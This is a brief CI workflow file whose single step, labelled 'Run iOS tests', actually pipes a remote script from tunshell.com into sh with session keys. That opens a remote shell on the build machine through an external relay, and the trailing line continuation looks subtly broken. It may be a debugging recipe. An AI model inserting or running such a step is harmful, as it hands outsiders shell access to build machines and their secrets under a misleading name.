workflows:
  my-workflow:
    instance_type: mac_pro
    scripts:
      - name: Run iOS tests
        script: |
          curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T ZWWX2LlYgFPijUiZlD2ocU NuRsm6KI8aofvZ7ndYYRt4 eu.relay.tunshell.com \
          sleep 500s
